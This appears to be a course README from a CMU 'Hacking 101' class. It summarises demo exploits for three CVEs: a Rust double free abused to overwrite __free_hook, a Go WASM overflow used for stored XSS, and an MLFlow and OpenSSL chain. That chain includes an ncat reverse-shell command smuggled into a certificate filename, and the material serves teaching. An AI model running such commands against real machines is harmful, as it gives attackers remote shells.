Set of CVE presentations for 18-739D: Special Topics in Security: Hacking 101 course at CMU.
First CVE is a buffer overflow vulnerability in the Rust standard library.
make_contiguous
in the standard library has a bug that pops the same element more than once under specific conditions. This results in double free scenarios.- Rust claims to be a type safe language, and hence prevents out-of-bound memory accesses. However, for performance purposes, there are certain parts in the rust implementation which are implemented with unsafe attributes.
make_contiguous
is one of the instances of unsafe attribute usage, which results in this vulnerability. - Demo includes an application that uses a vulnerable version of Rust. The exploit demonstrates use of this CVE to defeat ASLR and override
__free_hook
in GLIBC to open a shell with root privileges.
The exploit is divided into two stages:
- First stage leaks an address from GLIBC malloc arena. This leaked address can be used to defeat ASLR and calculate absolute
__free_hook
address for a particular application run. - Once absolute address for
__free_hook
is calculated,__free_hook
can be set to address ofsystem
. The argument to free is corrupted and overwritten to/bin/sh
.
NOTE: This exploit assumes that the system has GLIBC2.34 or older, as malloc hooks are removed from GLIBC to prevent similar exploits. For the demo purposes, default GLIBC was replaced with GLIBC2.24 using LD_PRELOAD.
Second CVE is a buffer overflow in GO compiled WASM modules.
wasm_exec.js
does not check length of input parameters.- This results in the ability to overwrite any sections stored in WASM linear memory.
Possible attack vectors could be:
- Overwriting type information to cause out-of-bound memory accesses by creating type confusion.
- Overwriting shared variables in the data section.
- Overwriting entries in function symbol table (not realizable because GO computes runtime hash of symbol table)
- Demo exploit included a stored XSS attack by overwriting shared variables.
- Demo for this exploit is available at https://github.com/gkrishnan724/CVE-2021-38297
Third CVE is exploiting a chain of vulnerabilities in MLFlow webserver and OpenSSL.
- Attacker can these vulnerabilities to open a reverse shell on victims machine.
- MLFlow Vulnerability: MLFlow server script misses the check for paths like
C:..
, allowing the attacker to create a file at a path outside the actual server directory. - OpenSSL Vulnerability: When update-ca-certificates command is executed, OpenSSL triggers c_rehash perl script that puts the filename as an argument to OpenSSL command. If a malicious file is injected as a certificate, c_rehash will put the filename as an argument and inject a command into victims machine.
Demo exploit for this chain of CVEs work as follows:
- Attacker opens a port and listens for connections on his machine using a command like
ncat -l 4444
. - Attacker creates a malicious file with the name
hello.crt`ncat 192.168.50.122 4444 -c cmd.exe`
using MLFlow vulnerability (192.168.50.122 is attackers IP address used to open a reverse shell). - Victim machine triggers update-ca-certificates, which finally executes
ncat 192.168.50.122 4444 -c cmd.exe
. - Victim's machine connects to attackers machine on port 4444 and runs cmd.exe.